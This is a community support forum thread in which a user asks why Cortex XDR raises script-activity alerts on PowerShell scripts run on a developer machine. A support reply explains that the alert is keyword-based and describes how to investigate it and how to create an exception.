08-09-2024 12:49 AM
Hello everyone,
I just received this alert "Script Activity - 245655498" with this description "Suspicious script with keywords written in a non-standard way." in Cortex multiple times related to PowerShell script execution on a developer machine. The executed scripts were different and I don't know why Cortex is blocking such executions. There is also no documentation on this.
Alert source: XDR Agent
Initiator and CGO path are the same in one of the alerts: "C:\Program Files\PowerShell\7\pwsh.exe" -WindowStyle Minimized -file c:\folder1\script.ps1
Thank you for your help 🙂
08-19-2024 09:13 AM
Hello @Arman_Zaheri
Thanks for reaching out on live community!
This alert is due to the use of suspicious keywords/parameters in the script which may inline with malicious behaviour. Please investigate the causality chain and the involved command line. If script is benign and executed by your employees for legitimate purpose then you may need to create exception for it. To create exception, identify the module which triggered the alert from alert table. Then based on either script location or command line you can create exception for the module and apply to particular profile which was applied to developer machines.
Please open a support case if you need more help with alert investigation/exception.
Please click Accept as Solution to acknowledge that the answer to your question has been provided.
Click Accept as Solution to acknowledge that the answer to your question has been provided.
The button appears next to the replies on topics you’ve started. The member who gave the solution and all future visitors to this topic will appreciate it!
These simple actions take just seconds of your time, but go a long way in showing appreciation for community members and the LIVEcommunity as a whole!
The LIVEcommunity thanks you for your participation!
